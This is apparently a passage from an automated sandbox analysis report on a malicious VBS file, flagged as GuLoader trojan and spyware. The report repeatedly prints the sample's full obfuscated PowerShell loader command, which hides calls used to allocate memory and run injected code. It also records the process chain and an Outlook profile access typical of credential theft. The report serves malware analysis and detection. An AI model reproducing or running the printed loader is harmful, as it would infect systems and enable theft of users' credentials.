OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Potential malicious VBS script found (suspicious strings)
            Source: Initial file: semirattlesnake.ShellExecute Angularises, " " & chrw(34) & Eu8 & chrw(34), "", "", 0
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728
            Source: SIEM_PO00938467648.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008EEB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008EEB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008ECEB9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008ECEC8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079DE7B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079D7180
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079D91C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079DE7A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B429F0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA06BE0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA0E5EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA08B70
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA08C50
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B7030
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BAC70
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BC490
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B94D0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B4510
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BDE10
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B6688
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B0ACA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BECD0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_20491540
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_20492D68
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_20493810
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204950D8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_2049458A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204948A0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204911C2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204914D4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63B206 NtQuerySystemInformation,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63B1D5 NtQuerySystemInformation,
            Source: SIEM_PO00938467648.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dll
            Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63AAB6 AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63AA7F AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ch5v15x.nhz.ps1Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:304:WilStaging_02
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: Binary string: l8C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.pdb source: powershell.exe, 00000006.00000002.86750406025.0000000004961000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Obfuscated command line found
